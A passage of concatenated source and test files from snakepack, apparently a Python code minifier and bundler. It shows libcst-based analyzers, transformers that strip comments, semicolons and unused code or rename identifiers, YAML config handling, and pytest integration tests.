self._literal_counts: Dict[str, Tuple[int, List[SimpleString]]] = {}
def visit_SimpleString(self, node: SimpleString) -> Optional[bool]:
if node.value not in self._literal_counts:
self._literal_counts[node.value] = (0, [])
self._literal_counts[node.value] = (self._literal_counts[node.value][0] + 1, self._literal_counts[node.value][1])
self._literal_counts[node.value][1].append(node)
for duplicated_node in self._literal_counts[node.value][1]:
self.set_metadata(duplicated_node, self._literal_counts[node.value][1])
class _LiteralAssignmentProvider(
VisitorMetadataProvider[
Dict[
str,
Sequence[
Union[Assign, AnnAssign, AugAssign]
]
]
]):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._literal_assignments: Dict[str, Dict[str, List[Union[Assign, AnnAssign, AugAssign]]]] = {}
self._literals_referenced: Set[str] = set()
def visit_SimpleString(self, node: SimpleString) -> Optional[bool]:
self._literals_referenced.add(node.value)
def visit_Assign(self, node: Assign) -> Optional[bool]:
if isinstance(node.value, SimpleString):
for target in node.targets:
if isinstance(target.target, Name):
self._track_assignment_for_literal(node.value, target.target, node)
self._invalidate_previous_assignments(target.target, node.value, node)
def visit_AnnAssign(self, node: AnnAssign) -> Optional[bool]:
if isinstance(node.value, SimpleString) and isinstance(node.target, Name):
self._track_assignment_for_literal(node.value, node.target, node)
self._invalidate_previous_assignments(node.target, node.value, node)
def visit_AugAssign(self, node: AugAssign) -> Optional[bool]:
if isinstance(node.value, SimpleString) and isinstance(node.target, Name):
self._track_assignment_for_literal(node.value, node.target, node)
self._invalidate_previous_assignments(node.target, node.value, node)
def _track_assignment_for_literal(self, literal: SimpleString, name: Name, node: Union[Assign, AnnAssign, AugAssign]):
if literal.value in self._literals_referenced:
# don't track assignment as it follows after a reference
return
if literal.value not in self._literal_assignments:
self._literal_assignments[literal.value] = {}
if name not in self._literal_assignments[literal.value]:
self._literal_assignments[literal.value][name.value] = []
self._literal_assignments[literal.value][name.value].append(node)
self.set_metadata(literal, self._literal_assignments[literal.value])
def _invalidate_previous_assignments(self, name: Name, value: BaseExpression, node: Union[Assign, AnnAssign, AugAssign]):
# invalidate literal assignments if their identifier is assigned to again
invalidate = False
for literal_value, assignments in self._literal_assignments.items():
if name.value in assignments:
if (isinstance(node, AugAssign) or (isinstance(node, (Assign, AnnAssign)) and
(not isinstance(value, SimpleString) or value.value != literal_value))):
# invalidate because re-assignment to identifier with another value
del self._literal_assignments[literal_value][name.value]
CST_PROVIDERS = {
ParentNodeProvider,
_LiteralDuplicationCountProvider,
_LiteralAssignmentProvider
}
__config_name__ = 'literal_duplication'
```
#### File: snakepack/bundlers/_base.py
```python
from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Iterable, Sequence, Optional
from snakepack.assets import Asset, AssetGroup
from snakepack.config.options import ConfigurableComponent
from snakepack.loaders import Loader
from snakepack.transformers import Transformer
class Bundle:
def __init__(self, name: str, bundler: Bundler, loader: Loader, transformers: Sequence[Transformer]):
self._name = name
self._bundler = bundler
self._loader = loader
self._asset_group: Optional[AssetGroup] = None
self._transformers = transformers
@property
def name(self) -> str:
return self._name
@property
def bundler(self) -> Bundler:
return self._bundler
@property
def loader(self) -> Loader:
return self._loader
@property
def asset_group(self) -> AssetGroup:
return self._asset_group
@property
def transformers(self) -> Sequence[Transformer]:
return self._transformers
def load(self):
self._asset_group = self._loader.load()
def bundle(self, *args, **kwargs):
return self._bundler.bundle(self, *args, **kwargs)
class Bundler(ConfigurableComponent, ABC):
@abstractmethod
def bundle(self, bundle: Bundle, package):
raise NotImplementedError
```
#### File: snakepack/config/formats.py
```python
from pathlib import Path, PosixPath, WindowsPath, PurePath
import yaml
from yaml import YAMLError
from snakepack.config import ConfigException
from snakepack.config.model import SnakepackConfig
from snakepack.config.types import PythonVersion, FullyQualifiedPythonName
def path_to_yaml(dumper, data):
return dumper.represent_data(str(data))
def pythonversion_to_yaml(dumper, data):
return dumper.represent_data(data.value)
def fqpn_to_yaml(dumper, data):
return dumper.represent_data(str(data))
yaml.add_representer(PosixPath, path_to_yaml)
yaml.add_representer(WindowsPath, path_to_yaml)
yaml.add_representer(PythonVersion, pythonversion_to_yaml)
yaml.add_representer(FullyQualifiedPythonName, fqpn_to_yaml)
def parse_yaml_config(config: str) -> SnakepackConfig:
try:
config_dict = yaml.safe_load(config)
except YAMLError as e:
raise ConfigException('Configuration contains invalid YAML')
return SnakepackConfig(**config_dict)
def generate_yaml_config(config: SnakepackConfig) -> str:
config_dict = config.dict()
yaml_config = yaml.dump(config_dict)
return yaml_config
```
#### File: snakepack/config/types.py
```python
from __future__ import annotations
import re
import sys
from abc import ABC
from enum import Enum, unique
from typing import Sequence, Optional, Match, Union
class Selector(ABC, str):
REGEX = NotImplemented
_selector_types = set()
@classmethod
def __init_subclass__(cls, **kwargs):
Selector._selector_types.add(cls)
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(cls, value):
for selector_type in cls._selector_types:
if selector_type.REGEX.fullmatch(value):
return selector_type(value)
raise ValueError(f"Invalid selector '{value}'")
@unique
class PythonVersion(Enum):
PYTHON_37 = '3.7'
PYTHON_38 = '3.8'
PYTHON_39 = '3.9'
PYTHON_310 = '3.10'
@classmethod
def current(cls) -> PythonVersion:
return PythonVersion(f'{sys.version_info[0]}.{sys.version_info[1]}')
class FullyQualifiedPythonName(Selector):
_MODULE_NAME_REGEX = r'([a-zA-Z0-9_]+)(\.[a-zA-Z0-9_]+)*'
_IDENTIFIER_NAME_REGEX = r'([a-zA-Z_][a-zA-Z0-9_]*)(\.[a-zA-Z_][a-zA-Z0-9_]*)*'
REGEX = re.compile(
rf'^(?P<module_path>{_MODULE_NAME_REGEX})(:(?P<ident_path>{_IDENTIFIER_NAME_REGEX}))?$'
)
def __new__(cls, value: Union[str, Match]):
match = cls.REGEX.fullmatch(value)
if not match:
raise ValueError('Invalid fully qualified python name')
module_path = match.group('module_path')
ident_path = match.group('ident_path')
mod_path_elems = []
if module_path is not None:
mod_path_elems.extend(module_path.split('.'))
id_path_elems = []
if ident_path is not None:
id_path_elems.extend(ident_path.split('.'))
obj = str.__new__(cls, value)
obj._module_path = mod_path_elems
obj._ident_path = id_path_elems
return obj
@property
def module_path(self) -> Sequence[str]:
return list(self._module_path)
@property
def ident_path(self) -> Sequence[str]:
return list(self._ident_path)
@property
def has_module_path(self) -> bool:
return len(self._module_path) > 0
@property
def has_ident_path(self) -> bool:
return len(self._ident_path) > 0
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(cls, value):
return cls(value)
```
#### File: snakepack/loaders/generic.py
```python
from pathlib import Path
from typing import Sequence
from snakepack.assets import AssetGroup
from snakepack.assets._base import GenericAssetGroup, FileContentSource
from snakepack.assets.generic import StaticFile
from snakepack.config.options import Options
from snakepack.loaders import Loader
class StaticFileLoader(Loader):
def load(self) -> GenericAssetGroup:
assets = []
for path in self._options.paths:
asset = StaticFile.from_source(
name=path,
target_path=path,
source=FileContentSource(path=path)
)
assets.append(asset)
return GenericAssetGroup(assets=assets)
class Options(Options):
paths: Sequence[Path] = []
__all__ = [
StaticFileLoader
]
```
#### File: snakepack/packagers/_base.py
```python
from __future__ import annotations
from abc import abstractmethod, ABC
from pathlib import Path
from typing import Iterable, Dict, Optional
from snakepack.bundlers import Bundle
from snakepack.config.options import Options, ConfigurableComponent
class Package:
def __init__(self, name: str, packager: Packager, bundles: Iterable[Bundle]):
self._name = name
self._packager = packager
self._bundles = {bundle.name: bundle for bundle in bundles}
@property
def name(self):
return self._name
@property
def bundles(self) -> Dict[str, Bundle]:
return self._bundles
@property
def packager(self) -> Packager:
return self._packager
@property
def target_path(self) -> Path:
return self._packager.get_target_path(self)
def package(self):
return self._packager.package(self)
class Packager(ConfigurableComponent, ABC):
@abstractmethod
def package(self, package: Package):
raise NotImplementedError
@abstractmethod
def get_target_path(self, package: Package) -> Path:
raise NotImplementedError
```
#### File: snakepack/packagers/generic.py
```python
from __future__ import annotations
from pathlib import Path
from snakepack.config.options import Options
from snakepack.packagers import Packager, Package
class DirectoryPackager(Packager):
def get_target_path(self, package: Package) -> Path:
return self._global_options.target_base_path / Path(self._options.output_path.format(package_name=package.name))
def package(self, package: Package):
output_path = self.get_target_path(package)
output_path.mkdir(parents=True, exist_ok=True)
for bundle in package.bundles.values():
bundle.bundle(package=package)
class Options(Options):
output_path: str = '{package_name}'
__config_name__ = 'directory'
__all__ = [
DirectoryPackager
]
```
#### File: snakepack/transformers/_base.py
```python
from abc import ABC, abstractmethod
from typing import Type, Mapping, Union
from snakepack.analyzers import Analyzer
from snakepack.assets import Asset, AssetContent, AssetGroup
from snakepack.config.options import ConfigurableComponent
class Transformer(ConfigurableComponent, ABC):
REQUIRED_ANALYZERS = []
@abstractmethod
def transform(
self,
analyses: Mapping[Type[Analyzer], Analyzer.Analysis],
subject: Union[Asset, AssetGroup]
) -> Union[Asset, AssetGroup]:
raise NotImplementedError
```
#### File: transformers/python/remove_comments.py
```python
from typing import Optional, Union
from libcst import CSTTransformer, Comment, RemovalSentinel
from snakepack.transformers.python._base import PythonModuleTransformer, BatchablePythonModuleTransformer
class RemoveCommentsTransformer(BatchablePythonModuleTransformer):
class _CstTransformer(PythonModuleTransformer._CstTransformer):
def leave_Comment(self, original_node: Comment, updated_node: Comment) -> Union[Comment, RemovalSentinel]:
return RemovalSentinel.REMOVE
__config_name__ = 'remove_comments'
```
#### File: transformers/python/remove_literal_statements.py
```python
from typing import Optional, Union
from libcst import CSTTransformer, Comment, RemovalSentinel, SimpleStatementLine, BaseStatement, FlattenSentinel, \
MaybeSentinel, FunctionDef, SimpleStatementSuite, IndentedBlock, Pass, BaseSmallStatement, Expr, Integer, BaseSuite, \
BaseNumber, BaseString, Tuple, BaseList, BaseSet, BaseDict
from snakepack.analyzers.python.literals import LiteralDuplicationAnalyzer
from snakepack.transformers.python._base import PythonModuleTransformer, BatchablePythonModuleTransformer
class RemoveLiteralStatementsTransformer(BatchablePythonModuleTransformer):
REQUIRED_ANALYZERS = PythonModuleTransformer.REQUIRED_ANALYZERS + [
LiteralDuplicationAnalyzer
]
class _CstTransformer(PythonModuleTransformer._CstTransformer):
def leave_SimpleStatementSuite(
self,
original_node: SimpleStatementSuite,
updated_node: SimpleStatementSuite,
) -> BaseSuite:
if len(updated_node.body) > 1:
return updated_node.with_changes(
body=[
stmt
for stmt in updated_node.body
if (not isinstance(stmt, Expr) or
(stmt.value is not Ellipsis and
not isinstance(stmt.value, (
BaseNumber,
BaseString,
Tuple,
BaseList,
BaseSet,
BaseDict
)
))
)
]
)
return updated_node
def leave_IndentedBlock(self, original_node: IndentedBlock, updated_node: IndentedBlock) -> BaseSuite:
changed_body = []
for line in updated_node.body:
if isinstance(line, SimpleStatementLine):
changed_line = line.with_changes(
body=[
stmt
for stmt in line.body
if not isinstance(stmt, Expr) or
(stmt.value is not Ellipsis and
not isinstance(stmt.value, (
BaseNumber,
BaseString,
Tuple,
BaseList,
BaseSet,
BaseDict
)
)
)
]
)
if len(changed_line.body) > 0:
changed_body.append(changed_line)
else:
changed_body.append(line)
if len(changed_body) == 0:
# statement required - add 0 literal
changed_body.append(
SimpleStatementLine(
body=[
Expr(
value=Integer(
value='0'
)
)
]
)
)
return updated_node.with_changes(body=changed_body)
__config_name__ = 'remove_literal_statements'
```
#### File: transformers/python/remove_semicolons.py
```python
from typing import Optional, Union
from libcst import CSTTransformer, Comment, RemovalSentinel, SimpleStatementLine, BaseStatement, FlattenSentinel, \
MaybeSentinel
from snakepack.transformers.python._base import PythonModuleTransformer, BatchablePythonModuleTransformer
class RemoveSemicolonsTransformer(BatchablePythonModuleTransformer):
class _CstTransformer(PythonModuleTransformer._CstTransformer):
def leave_SimpleStatementLine(
self, original_node: SimpleStatementLine, updated_node: SimpleStatementLine
) -> Union[BaseStatement, FlattenSentinel[BaseStatement], RemovalSentinel]:
updated_statements = []
num_statements = len(original_node.body)
for index, statement in enumerate(original_node.body):
if index == num_statements - 1: # last statement, semicolon not required
updated_statements.append(statement.with_changes(semicolon=MaybeSentinel.DEFAULT))
else:
updated_statements.append(statement)
return updated_node.with_changes(body=updated_statements)
__config_name__ = 'remove_semicolons'
```
#### File: transformers/python/remove_unreferenced_code.py
```python
from typing import Optional, Union
from libcst import CSTTransformer, Comment, RemovalSentinel, SimpleStatementLine, BaseStatement, FlattenSentinel, \
MaybeSentinel, ClassDef, Name, FunctionDef, CSTNode, BaseSmallStatement, Assign, Attribute, AnnAssign, Import, \
Tuple, List, ImportFrom, ImportStar
from libcst.metadata import FunctionScope, ClassScope, ComprehensionScope, GlobalScope
from snakepack.analyzers.python.imports import ImportGraphAnalyzer
from snakepack.analyzers.python.scope import ScopeAnalyzer
from snakepack.transformers.python._base import PythonModuleTransformer
class RemoveUnreferencedCodeTransformer(PythonModuleTransformer):
REQUIRED_ANALYZERS = PythonModuleTransformer.REQUIRED_ANALYZERS + [
ScopeAnalyzer,
ImportGraphAnalyzer
]
class _CstTransformer(PythonModuleTransformer._CstTransformer):
def leave_FunctionDef(
self, original_node: FunctionDef, updated_node: FunctionDef
) -> Union[BaseStatement, FlattenSentinel[BaseStatement], RemovalSentinel]:
if not self._is_referenced(original_node, updated_node.name.value, assignment=False):
return RemovalSentinel.REMOVE
return updated_node
def leave_ClassDef(
self, original_node: ClassDef, updated_node: ClassDef
) -> Union[BaseStatement, FlattenSentinel[BaseStatement], RemovalSentinel]:
if not self._is_referenced(original_node, updated_node.name.value, assignment=False):
return RemovalSentinel.REMOVE
return updated_node
def leave_Assign(
self, original_node: Assign, updated_node: Assign
) -> Union[BaseSmallStatement, FlattenSentinel[BaseSmallStatement], RemovalSentinel]:
if len(updated_node.targets) > 1:
# don't touch multi-assignments (need type inference for reliably remove)
return updated_node
scope = self._analyses[ScopeAnalyzer].get_scope_for_node(original_node)
if not isinstance(updated_node.targets[0].target, Name) or isinstance(scope, ClassScope):
# don't touch attributes (references not reliably detected)
return updated_node
if not self._is_referenced(original_node.targets[0].target, updated_node.targets[0].target.value):
return RemovalSentinel.REMOVE
return updated_node
def leave_AnnAssign(
self, original_node: AnnAssign, updated_node: AnnAssign
) -> Union[BaseSmallStatement, FlattenSentinel[BaseSmallStatement], RemovalSentinel]:
scope = self._analyses[ScopeAnalyzer].get_scope_for_node(original_node)
if not isinstance(updated_node.target, Name) or isinstance(scope, ClassScope):
# don't touch attributes (references not reliably detected)
return updated_node
if not self._is_referenced(original_node.target, updated_node.target.value):
return RemovalSentinel.REMOVE
return updated_node
def leave_Import(
self, original_node: Import, updated_node: Import
) -> Union[BaseSmallStatement, FlattenSentinel[BaseSmallStatement], RemovalSentinel]:
updated_imports = []
for import_ in original_node.names:
if import_.asname is None:
imported_name = import_.name.value if isinstance(import_.name, Name) else import_.name.attr.value
else:
assert isinstance(import_.asname.name, Name)
imported_name = import_.asname.name.value
if self._is_referenced(import_.name, imported_name):
updated_imports.append(import_)
if len(updated_imports) > 0:
updated_imports[-1] = updated_imports[-1].with_changes(comma=MaybeSentinel.DEFAULT)
return updated_node.with_changes(names=updated_imports)
return RemovalSentinel.REMOVE
def leave_ImportFrom(
self, original_node: ImportFrom, updated_node: ImportFrom
) -> Union[BaseSmallStatement, FlattenSentinel[BaseSmallStatement], RemovalSentinel]:
if isinstance(updated_node.names, ImportStar):
# don't remove star imports
return updated_node
updated_imports = []
for import_ in original_node.names:
if import_.asname is None:
imported_name = import_.name.value if isinstance(import_.name, Name) else import_.name.attr.value
else:
assert isinstance(import_.asname.name, Name)
imported_name = import_.asname.name.value
if self._is_referenced(import_.name, imported_name):
updated_imports.append(import_)
if len(updated_imports) > 0:
updated_imports[-1] = updated_imports[-1].with_changes(comma=MaybeSentinel.DEFAULT)
return updated_node.with_changes(names=updated_imports)
return RemovalSentinel.REMOVE
def _is_referenced(self, node: CSTNode, identifier: str, assignment=True) -> bool:
if not assignment and self._analyses[ScopeAnalyzer].is_in_local_scope(node):
scope = self._analyses[ScopeAnalyzer].get_scope_for_node(node)
if identifier in scope.accesses:
# only remove unreferenced code in local scope
return True
return False
# fallback to assuming the code is referenced
return True
__config_name__ = 'remove_unreferenced_code'
```
#### File: transformers/python/_renaming.py
```python
import string
from collections import deque
from itertools import chain, cycle, dropwhile, islice, permutations, repeat, count
from keyword import iskeyword
from typing import Mapping, Iterable, Dict, Set, Optional, List, Generator, Deque, Tuple
from libcst.metadata import Scope, Assignment
class NameRegistry:
def __init__(self):
self._scopes: Dict[Scope, Tuple[Generator[str, None, None], Deque]] = {}
self._registered_names: Dict[Scope, Set[str]] = {}
def generate_name_for_scope(self, scope: Scope) -> str:
if scope not in self._scopes:
self._scopes[scope] = self._generate_identifiers()
if scope not in self._registered_names:
self._registered_names[scope] = set()
name = None
while name is None or name in self._registered_names[scope] or iskeyword(name):
name = next(self._scopes[scope])
return name
def register_name_for_scope(self, scope: Scope, name: str):
if scope not in self._registered_names:
self._registered_names[scope] = set()
self._registered_names[scope].add(name)
self._scopes[scope] = self._generate_identifiers()
def reset(self, scope: Scope):
self._scopes[scope] = self._generate_identifiers()
def _generate_identifiers(self):
first_chars = string.ascii_letters
chars = first_chars + string.digits
yield from first_chars
size = 2
while True:
yield from map(lambda x: ''.join(x), permutations(chars, size))
size += 1
```
#### File: tests/acceptance/test_snakepack.py
```python
from pathlib import Path
import pytest
from snakepack.app import snakepack
from tests.acceptance._base import BaseAcceptanceTest, per_transformer, ALL_TRANSFORMERS
class SnakepackAcceptanceTest(BaseAcceptanceTest):
_SUBJECT_NAME = 'snakepack'
_SOURCEDIR = Path(__file__).resolve().parent.parent.parent
_APPLICATION_ENTRY_POINT = 'snakepack/__main__.py'
_EXTRA_INCLUDES = ['pkg_resources._vendor.appdirs']
_LIBRARY_PACKAGES = ['snakepack', 'tests']
_TEST_CMD = 'pytest -m "not hypothesis" -k "not AcceptanceTest" {dist_path}/tests'
_EXTRA_TEST_FILES = ['pyproject.toml']
# application tests (import graph loader)
def test_snakepack_as_application_with_no_transformers(self, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_application_config(transformers=None, test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_application_compiled_output(test_path=test_path, cli_runner=cli_runner)
def test_snakepack_as_application_with_all_transformers(self, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_application_config(transformers=ALL_TRANSFORMERS, test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_application_compiled_output(test_path=test_path, cli_runner=cli_runner)
@per_transformer()
def test_snakepack_as_application_with_each_transformer_individually(self, transformer, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_application_config(transformers=[transformer], test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_application_compiled_output(test_path=test_path, cli_runner=cli_runner)
# library tests (package loader)
def test_snakepack_as_library_with_no_transformers(self, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_library_config(transformers=None, test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_library_compiled_output(test_path=test_path)
def test_snakepack_as_library_with_all_transformers(self, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_library_config(transformers=ALL_TRANSFORMERS, test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_library_compiled_output(test_path=test_path)
@per_transformer()
def test_snakepack_as_library_with_each_transformer_individually(self, transformer, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_library_config(transformers=[transformer], test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_library_compiled_output(test_path=test_path)
def _test_application_compiled_output(self, test_path, cli_runner):
config = self._create_application_config(test_path=test_path, roundtrip=True)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, roundtrip=True)
```
#### File: analyzers/python/test_scope.py
```python
from textwrap import dedent
from libcst import parse_module
from libcst.metadata import FunctionScope, ScopeProvider
from snakepack.analyzers.python.scope import ScopeAnalyzer
from snakepack.assets.python import PythonModuleCst, PythonModule
class ScopeAnalyzerIntegrationTest:
def test_analyze(self):
content = PythonModuleCst(
cst=parse_module(
dedent(
"""
a = True
def b(c):
return c
class D:
e = True
def f(g):
return g
"""
)
)
)
module = PythonModule(
name='a',
content=content,
source=None
)
analyzer = ScopeAnalyzer()
analysis = analyzer.analyse_subject(module)
g_var = content.cst.body[2].body.body[1].body.body[0].body[0].value
assert isinstance(analysis[ScopeProvider][g_var], FunctionScope)
assert analysis[ScopeProvider][g_var]
```
#### File: integration/config/test_formats.py
```python
from pathlib import Path
from textwrap import dedent
import pytest
from snakepack.bundlers.generic import FileBundler
from snakepack.config import ConfigException
from snakepack.config.options import ComponentConfig
from snakepack.config.model import SnakepackConfig, PackageConfig, BundleConfig
from snakepack.config.formats import parse_yaml_config
from snakepack.loaders.python import ImportGraphLoader
from snakepack.packagers.generic import DirectoryPackager
from snakepack.transformers.python.remove_comments import RemoveCommentsTransformer
class ParseYamlConfigIntegrationTest:
def test_full(self):
yaml = dedent(
"""
source_base_path: 'src/'
target_base_path: 'dist/'
packages:
snakepack:
packager:
name: directory
options:
output_path: 'snakepack_pkg/'
bundles:
snakepack:
bundler:
name: file
options:
loader:
name: import_graph
options:
entry_point: 'snakepack.py'
transformers:
- name: remove_comments
options:
"""
)
parsed_config = parse_yaml_config(yaml)
assert parsed_config == SnakepackConfig(
source_base_path=Path('src/'),
target_base_path=Path('dist/'),
packages={
'snakepack': PackageConfig(
packager=ComponentConfig(
name='directory',
options=DirectoryPackager.Options(
output_path='snakepack_pkg/'
)
),
bundles={
'snakepack': BundleConfig(
bundler=ComponentConfig(
name='file',
options=FileBundler.Options()
),
loader=ComponentConfig(
name='import_graph',
options=ImportGraphLoader.Options(
entry_point=Path('snakepack.py')
)
),
transformers=[
ComponentConfig(
name='remove_comments',
options=RemoveCommentsTransformer.Options()
)
]
)
}
)
}
)
def test_invalid_yaml(self):
yaml = dedent(
"""
packages:
:
"""
)
with pytest.raises(ConfigException):
parse_yaml_config(yaml)
```
#### File: transformers/python/test_remove_semicolons.py
```python
from textwrap import dedent
from libcst import parse_module
from snakepack.analyzers.python.scope import ScopeAnalyzer
from snakepack.assets.python import PythonModuleCst
from snakepack.config.model import GlobalOptions
from snakepack.transformers.python.remove_semicolons import RemoveSemicolonsTransformer
from tests.integration.transformers.python._base import PythonModuleCstTransformerIntegrationTestBase
class RemoveSemicolonsTransformerIntegrationTest(PythonModuleCstTransformerIntegrationTestBase):
_TRANSFORMER_CLASS = RemoveSemicolonsTransformer
def test_transform(self):
input_content = dedent(
"""
x = 5;
foo();
x=4;x=3;
a:int=3;
assert True;
"""
)
expected_output_content = dedent(
"""
x = 5
foo()
x=4;x=3
a:int=3
assert True
"""
)
self._test_transformation(input=input_content, expected_output=expected_output_content)
```
#### File: transformers/python/test_rename_identifiers.py
```python
from textwrap import dedent
from typing import Iterable
from unittest.mock import MagicMock
from libcst import parse_module
from snakepack.analyzers import Analyzer
from snakepack.analyzers.python.imports import ImportGraphAnalyzer
from snakepack.analyzers.python.scope import ScopeAnalyzer
from snakepack.assets.python import PythonModuleCst
from snakepack.config.model import GlobalOptions
from snakepack.transformers.python.rename_identifiers import RenameIdentifiersTransformer
from tests.integration.transformers.python._base import PythonModuleCstTransformerIntegrationTestBase
class RenameIdentifiersTransformerIntegrationTest(PythonModuleCstTransformerIntegrationTestBase):
_TRANSFORMER_CLASS = RenameIdentifiersTransformer
def test_transform(self):
input_content = dedent(
"""
xo = 5;
def foo(attr, anattr):
pass
def bar(attr, anattr):
return b(attr, anattr)
class Class(object):
attr = 'foo'
foo(x);
yo = 6
a = xo + yo
Class.attr = 'bar'
def imported(a, b, c):
ooops = True
def inner():
nonlocal ooops
print(ooops)
zigzag = 5
zigzag = 6
def function():
zigzag = 0
zigzag += 1
"""
)
expected_output_content = dedent(
"""
b = 5;
def c(d, e):
pass
def d(e, f):
return b(e, f)
class e(object):
attr = 'foo'
c(x);
f = 6
a = b + f
e.attr = 'bar'
def imported(a, b, c):
j = True
def g():
nonlocal j
print(j)
h = 5
h = 6
def g():
h = 0
h += 1
"""
)
self._test_transformation(
input=input_content,
expected_output=expected_output_content,
options=RenameIdentifiersTransformer.Options(only_rename_locals=False)
)
def test_transform_only_rename_in_local_scope(self):
input_content = dedent(
"""
xo = 5;
def foo(attr: int, anattr):
pass
def bar(attr, anattr: str):
return b(attr, anattr)
class Class(object):
attr = 'foo'
foo(x);
yo = 6
a = xo + yo
Class.attr = 'bar'
def imported(a, b, c):
ooops = True
def inner():
nonlocal ooops
nonlocal c
print(ooops)
zigzag = 5
zigzag = 6
def function():
zigzag = 0
zigzag += 1
def nonlocal_1():
foobar = True
def nonlocal_2():
nonlocal foobar
foobar = False
def func1():
var1 = 1
def func2(some_var: SomeClazz):
var2 = 2
print(some_var)
some_var = 'reassigned'
def func3(other_var):
print(var2=some_var)
print(other_var)
print(var1 + var2)
def importtest():
imported_var: SomeType
from some_module import imported_var
"""
)
expected_output_content = dedent(
"""
xo = 5;
def foo(attr: int, anattr):
pass
def bar(attr, anattr: str):
return b(attr, anattr)
class Class(object):
attr = 'foo'
foo(x);
yo = 6
a = xo + yo
Class.attr = 'bar'
def imported(a, b, c):
d = True
def e():
nonlocal d
nonlocal c
print(d)
zigzag = 5
zigzag = 6
def function():
b = 0
zigzag += 1
def nonlocal_1():
b = True
def c():
nonlocal b
b = False
def func1():
b = 1
def c(some_var: SomeClazz):
d = 2
print(some_var)
some_var = 'reassigned'
def e(other_var):
print(var2=some_var)
print(other_var)
print(b + d)
def importtest():
imported_var: SomeType
from some_module import imported_var
"""
)
self._test_transformation(input=input_content, expected_output=expected_output_content)
def _create_analyzers(self) -> Iterable[Analyzer]:
def _get_importing_modules(module, identifier):
if identifier == 'imported':
return [
MagicMock()
]
return []
def _identifier_imported_in_module(identifier, module):
if identifier == 'imported_var':
return True
return False
import_graph_analysis = MagicMock(spec=ImportGraphAnalyzer.Analysis)
import_graph_analysis.get_importing_modules.side_effect = _get_importing_modules
import_graph_analysis.identifier_imported_in_module.side_effect = _identifier_imported_in_module
import_graph_analyzer = MagicMock(spec=ImportGraphAnalyzer)
import_graph_analyzer.analyse_assets.return_value = import_graph_analysis
return [
ScopeAnalyzer(),
import_graph_analyzer
]
```
#### File: analyzers/python/test_imports.py
```python
from unittest.mock import MagicMock
import pytest
from libcst import Import, ImportAlias, Name, Attribute, Module
from modulegraph.modulegraph import ModuleGraph, Node
from snakepack.assets import AssetContent
from snakepack.analyzers.python.imports import ImportGraphAnalyzer
from snakepack.assets.python import PythonApplication, PythonModule
class ImportGraphAnalyzerAnalysisTest:
def test_modulegraph_returns_no_referers(self):
module_graph = MagicMock(spec=ModuleGraph)
module_graph.getReferers.return_value = []
node_map = MagicMock()
import_metadata = MagicMock()
test_imported_module = MagicMock(spec=PythonModule)
analysis = ImportGraphAnalyzer.Analysis(
module_graph=module_graph,
node_map=node_map,
import_metadata=import_metadata
)
imported_modules = analysis.get_importing_modules(test_imported_module)
assert imported_modules == []
def test_without_identifier(self):
module_graph = MagicMock(spec=ModuleGraph)
node1 = MagicMock(spec=Node)
node2 = MagicMock(spec=Node)
node3 = MagicMock(spec=Node)
module_graph.getReferers.return_value = [
node1,
node2
]
module1 = MagicMock(spec=PythonModule)
module2 = MagicMock(spec=PythonModule)
test_imported_module = MagicMock(spec=PythonModule)
node_map = {
module1: node1,
module2: node2,
test_imported_module: node3
}
module1_imports = MagicMock()
module2_imports = MagicMock()
testmodule_imports = MagicMock()
import_metadata = {
module1: module1_imports,
module2: module2_imports,
test_imported_module: testmodule_imports
}
analysis = ImportGraphAnalyzer.Analysis(
module_graph=module_graph,
node_map=node_map,
import_metadata=import_metadata
)
imported_modules = analysis.get_importing_modules(test_imported_module)
assert len(imported_modules) == 2
assert module1 in imported_modules
assert module2 in imported_modules
@pytest.mark.skip
def test_import_stmts(self):
module_graph = MagicMock(spec=ModuleGraph)
node1 = MagicMock(spec=Node)
node2 = MagicMock(spec=Node)
node3 = MagicMock(spec=Node)
module_graph.getReferers.return_value = [
node1,
node2
]
module1 = MagicMock(spec=PythonModule)
module1_content = MagicMock(spec=AssetContent)
module1_cst = MagicMock(spec=Module)
module1_content.cst = module1_cst
module1.content = module1_content
module2 = MagicMock(spec=PythonModule)
module2_content = MagicMock(spec=AssetContent)
module2_cst = MagicMock(spec=Module)
module2_content.cst = module2_cst
module2.content = module2_content
test_imported_module = MagicMock(spec=PythonModule)
test_imported_module.name = 'testmodule'
test_identifier = 'test'
node_map = {
module1: node1,
module2: node2,
test_imported_module: node3
}
module1_importstmt = MagicMock(spec=Import)
module1_importalias1 = MagicMock(spec=ImportAlias)
module1_importalias1_name = MagicMock(spec=Name)
module1_importalias1_name.value = 'not_test'
module1_importalias1.name = module1_importalias1_name
module1_importalias2 = MagicMock(spec=ImportAlias)
module1_importalias2_attr = MagicMock(spec=Attribute)
module1_importalias2_attr_name = MagicMock(spec=Name)
module1_importalias2_attr_name.value = 'testmodule'
module1_importalias2_attr.attr = module1_importalias2_attr_name
module1_importalias2.name = module1_importalias2_attr
module1_importstmt.names = [
module1_importalias1,
module1_importalias2
]
module1_imports = [
module1_importstmt
]
module2_importstmt = MagicMock(spec=Import)
module2_importalias1 = MagicMock(spec=ImportAlias)
module2_importalias1_name = MagicMock(spec=Name)
module2_importalias1_name.value = 'foo'
module2_importalias1.name = module2_importalias1_name
